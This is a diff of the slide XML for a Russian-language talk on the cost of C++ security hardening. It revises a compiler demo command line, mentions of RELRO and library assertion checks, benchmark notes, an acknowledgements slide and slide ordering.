+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в других безопасных языках</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (Java, Swift, etc.)</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33499,7 +33356,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -33617,6 +33474,22 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Clang:</a:t>
             </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Компилировали </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CGBuiltin.cpp c -O2 (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>самый большой файл)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -9392,7 +9392,21 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ gcc -U_FORTIFY_SOURCE tmp5.c -O2 &amp;&amp; ./</a:t>
+              <a:t>$ gcc -U_FORTIFY_SOURCE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>repro.c</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -O2 &amp;&amp; ./</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -9605,22 +9619,47 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ gcc tmp5.c -O2 &amp;&amp; ./</a:t>
+              <a:t>$ </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
+              <a:t>gcc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>repro.c</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -O2 &amp;&amp; ./</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>a.out</a:t>
             </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>▫</a:t>
-            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -11064,7 +11103,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
+              <a:t>: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -15980,7 +16019,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (full RELRO)</a:t>
+              <a:t> (Full RELRO)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -32297,7 +32336,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (Java, Swift, Ada, etc.)</a:t>
+              <a:t> (Java, Swift, Ada, Solidity, etc.)</a:t>
             </a:r>
           </a:p>
         </p:txBody>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId99"/>
+    <p:notesMasterId r:id="rId100"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="280" r:id="rId2"/>
@@ -91,20 +91,21 @@
     <p:sldId id="330" r:id="rId82"/>
     <p:sldId id="345" r:id="rId83"/>
     <p:sldId id="346" r:id="rId84"/>
-    <p:sldId id="270" r:id="rId85"/>
-    <p:sldId id="347" r:id="rId86"/>
-    <p:sldId id="271" r:id="rId87"/>
-    <p:sldId id="274" r:id="rId88"/>
-    <p:sldId id="286" r:id="rId89"/>
-    <p:sldId id="278" r:id="rId90"/>
-    <p:sldId id="292" r:id="rId91"/>
-    <p:sldId id="298" r:id="rId92"/>
-    <p:sldId id="304" r:id="rId93"/>
-    <p:sldId id="310" r:id="rId94"/>
-    <p:sldId id="317" r:id="rId95"/>
-    <p:sldId id="322" r:id="rId96"/>
-    <p:sldId id="339" r:id="rId97"/>
-    <p:sldId id="338" r:id="rId98"/>
+    <p:sldId id="359" r:id="rId85"/>
+    <p:sldId id="270" r:id="rId86"/>
+    <p:sldId id="347" r:id="rId87"/>
+    <p:sldId id="271" r:id="rId88"/>
+    <p:sldId id="274" r:id="rId89"/>
+    <p:sldId id="286" r:id="rId90"/>
+    <p:sldId id="278" r:id="rId91"/>
+    <p:sldId id="292" r:id="rId92"/>
+    <p:sldId id="298" r:id="rId93"/>
+    <p:sldId id="304" r:id="rId94"/>
+    <p:sldId id="310" r:id="rId95"/>
+    <p:sldId id="317" r:id="rId96"/>
+    <p:sldId id="322" r:id="rId97"/>
+    <p:sldId id="339" r:id="rId98"/>
+    <p:sldId id="338" r:id="rId99"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -293,7 +294,7 @@
           <a:p>
             <a:fld id="{A8F27B54-EFD4-4F1F-9CE4-9A3C368187A4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -707,7 +708,7 @@
           <a:p>
             <a:fld id="{4E570717-CC08-42AC-84F3-7EB74EE2C2EE}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -905,7 +906,7 @@
           <a:p>
             <a:fld id="{E850434B-ABC0-4013-A159-517880C2CE4B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1113,7 +1114,7 @@
           <a:p>
             <a:fld id="{307E2251-42B8-4CD0-9F76-CE8A218C5A9B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1311,7 +1312,7 @@
           <a:p>
             <a:fld id="{650366BD-2959-43A5-9C43-B178997CA9C1}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1586,7 +1587,7 @@
           <a:p>
             <a:fld id="{44A443A2-278A-4AA2-A6FA-B813D9AB289B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1851,7 +1852,7 @@
           <a:p>
             <a:fld id="{8DB96CD0-8DC9-4D9E-8F97-A64EB549E498}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2263,7 +2264,7 @@
           <a:p>
             <a:fld id="{8728ABDD-F7C0-49E5-BDEF-78EEAB9D4FF0}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2404,7 +2405,7 @@
           <a:p>
             <a:fld id="{1815E602-B233-4072-AF5E-EEC16D6A3250}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2517,7 +2518,7 @@
           <a:p>
             <a:fld id="{B46368E2-0F8E-43F1-B205-4CE4ED81C818}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2828,7 +2829,7 @@
           <a:p>
             <a:fld id="{A90826D4-3247-4C35-B745-95D9A6527E86}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3116,7 +3117,7 @@
           <a:p>
             <a:fld id="{F697CA6C-CB8E-4E4E-A40B-CF748107F47F}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3357,7 +3358,7 @@
           <a:p>
             <a:fld id="{486D2D92-9836-4BF5-99A8-6BBA488E0F07}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/23/2025</a:t>
+              <a:t>7/24/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6102,7 +6103,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Переполнение стек (</a:t>
+              <a:t>Переполнение стека (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -12205,7 +12206,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -12256,6 +12257,24 @@
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>std::vector</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>std::</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>deque</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -12322,51 +12341,37 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверки корректности параметров мат. функций и распределений</a:t>
+              <a:t>Проверки предусловий </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>параметры мат. функций и распределений</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и т.п.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>LLVM:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Множество других мелких проверок типа </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>abs(INT_MIN)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> в</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>std::gcd</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>LLVM:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Например проверки на Strict Weak Ordering компараторов</a:t>
+              <a:t>Проверки на Strict Weak Ordering компараторов</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -32988,7 +32993,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5BE8CA-1735-42C5-903D-AFD61631E803}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33006,7 +33011,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание !</a:t>
+              <a:t>Благодарности</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33017,7 +33022,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF6EEF7-8884-4F6A-BCAB-68EF33B42776}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33035,7 +33040,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Полная версия слайдов доступна по адресу</a:t>
+              <a:t>Сергей Бронников (VK Tech/Tarantool)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33045,70 +33050,21 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
+              <a:t>https://bronevichok.ru/</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Вопросы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4048685" y="2932580"/>
-            <a:ext cx="2857500" cy="2857500"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D845B46-0A58-4C4D-AD1F-C171EA425E87}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33135,7 +33091,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3824336305"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33167,7 +33123,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33185,7 +33141,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Приложения</a:t>
+              <a:t>Спасибо за внимание !</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33193,10 +33149,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
+          <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33204,7 +33160,7 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="body" idx="1"/>
+            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
@@ -33212,16 +33168,82 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Полная версия слайдов доступна по адресу</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Вопросы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4048685" y="2932580"/>
+            <a:ext cx="2857500" cy="2857500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33248,7 +33270,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33280,7 +33302,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33298,7 +33320,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Воспроизведение результатов</a:t>
+              <a:t>Приложения</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33306,10 +33328,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
+          <p:cNvPr id="3" name="Text Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33317,204 +33339,15 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph idx="1"/>
+            <p:ph type="body" idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Версии дистрибутивов</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверялись последние </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0"/>
-              <a:t>стабильные</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> версии</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian 12 (bookworm), Fedora 42, Ubuntu 24.04 (noble)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Версии браузеров</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
